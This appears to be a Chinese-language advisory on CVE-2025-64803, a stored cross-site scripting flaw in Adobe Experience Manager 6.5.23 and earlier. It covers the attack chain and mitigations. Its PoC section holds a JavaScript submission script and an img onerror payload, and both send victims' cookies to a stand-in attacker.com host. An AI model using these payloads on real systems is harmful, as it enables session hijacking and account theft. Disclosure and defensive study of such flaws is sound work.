CVE-2025-64803: Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64803

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64803是Adobe Experience Manager中存在的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞影响6.5.23及更早版本。攻击者可以利用低权限账号在表单字段中注入恶意JavaScript脚本。当其他用户访问包含恶意脚本的页面时，脚本将在其浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于是存储型XSS，恶意脚本会被永久保存在服务器端，影响所有访问该页面的用户。CVSS评分5.4属于中等严重程度，主要因为攻击需要低权限账号和用户交互，但网络可达性和存储特性使其具有一定危害性。Adobe PSIRT团队于2025年12月10日披露此漏洞，并建议用户尽快更新到修复版本。

技术细节

Adobe Experience Manager 6.5.23及更早版本在处理用户输入的表单字段时未进行充分的输入验证和输出编码。攻击者以低权限用户身份登录系统后，可在评论、表单输入框或内容字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）。由于系统未对输入进行安全过滤，该脚本会被存储在数据库中。当其他用户访问包含该恶意内容的页面时，浏览器会解析并执行注入的脚本。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账户、执行未经授权的操作或进行钓鱼攻击。该漏洞属于OWASP Top 10中的A7（跨站脚本攻击）类别，攻击向量为网络，复杂度低，但需要低权限认证和用户交互（点击访问）才能成功利用。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager低权限账户（如内容作者或普通用户）

STEP 2

步骤2

攻击者识别存在漏洞的表单字段，通常是评论框、用户资料字段或内容输入区域

STEP 3

步骤3

攻击者在表单字段中注入恶意JavaScript代码，如<script>alert('XSS')</script>或更复杂的窃取Cookie脚本

STEP 4

步骤4

提交表单后，恶意脚本被存储在服务器数据库中，未经过滤或转义处理

STEP 5

步骤5

其他用户（受害者）访问包含恶意脚本的页面，浏览器自动执行注入的JavaScript代码

STEP 6

步骤6

恶意脚本执行后可窃取用户会话Cookie、劫持账户、执行操作或重定向到钓鱼网站

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64803 PoC - Adobe Experience Manager Stored XSS
// Target: Adobe Experience Manager < 6.5.24
// Attack Vector: Inject malicious script into form fields

// Step 1: Identify vulnerable form field
const vulnerableEndpoint = '/content/forms/af/<form-name>.html';

// Step 2: Prepare XSS payload
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Step 3: Submit form with XSS payload
async function exploitXSS() {
  const formData = new URLSearchParams();
  formData.append('field_name', xssPayload); // Inject into vulnerable field
  formData.append('_charset_', 'UTF-8');
  
  const response = await fetch(vulnerableEndpoint, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': '的低权限会话Cookie'
    },
    body: formData.toString()
  });
  
  console.log('XSS payload submitted successfully');
  console.log('Payload will execute when victim visits the page');
}

// Step 4: Social engineering - trick victim to visit the page
exploitXSS();

// Alternative: XHR exfiltration payload
const advancedPayload = `<img src=x onerror="var xhr=new XMLHttpRequest();xhr.open('GET','https://attacker.com/log?data='+btoa(document.cookie),true);xhr.send()">`;

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager < 6.5.24

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制低权限用户创建或编辑表单内容的功能；2) 在Web应用防火墙（WAF）层面添加XSS过滤规则；3) 启用浏览器的XSS过滤器；4) 对所有表单输入实施严格的输入验证；5) 监控日志中的可疑脚本注入尝试；6) 对受影响页面临时启用CSP策略限制内联脚本执行。